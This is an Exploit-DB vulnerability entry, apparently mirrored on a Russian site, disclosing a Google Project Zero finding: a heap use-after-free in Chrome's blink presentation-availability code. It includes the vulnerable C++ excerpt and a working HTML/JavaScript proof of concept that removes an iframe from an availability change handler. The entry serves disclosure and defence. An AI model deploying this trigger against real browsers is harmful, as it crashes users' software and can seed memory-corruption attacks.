- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 47211
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- MULTIPLE
- CVE
- N/A
- Дата публикации
- 2019-08-07
Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink:resentationAvailabilityState::UpdateAvailability
HTML:
<!--
VULNERABILITY DETAILS
void PresentationAvailabilityState::UpdateAvailability(
const KURL& url,
mojom::blink::ScreenAvailability availability) {
[...]
{
// Set |iterating_listeners_| so we know not to allow modifications
// to |availability_listeners_|.
base::AutoReset<bool> iterating(&iterating_listeners_, true);
for (auto& listener_ref : availability_listeners_) {
auto* listener = listener_ref.get();
if (!listener->urls.Contains<KURL>(url))
continue;
auto screen_availability = GetScreenAvailability(listener->urls);
DCHECK(screen_availability != mojom::blink::ScreenAvailability::UNKNOWN);
for (auto* observer : listener->availability_observers)
observer->AvailabilityChanged(screen_availability); // ***1***
[...]
`PresentationAvailabilityObserver::AvailabilityChanged` might call a user-defined JS event handler,
which in turn might modify `availability_observers` and invalidate the `for` loop's iterator.
VERSION
Chromium 74.0.3729.0 (Developer Build) (64-bit)
Chromium 76.0.3789.0 (Developer Build) (64-bit)
REPRODUCTION CASE
Note that you need an extra display connected to your machine to reproduce the bug, otherwise
`UpdateAvailability` won't be called.
-->
<body>
<script>
frame = document.body.appendChild(document.createElement("iframe"));
request = new frame.contentWindow.PresentationRequest([location]);
request.getAvailability().then(availability => {
availability.onchange = () => frame.remove();
});
</script>
</body>
<!--
CREDIT INFORMATION
Sergei Glazunov of Google Project Zero.
-->
- Источник
- www.exploit-db.com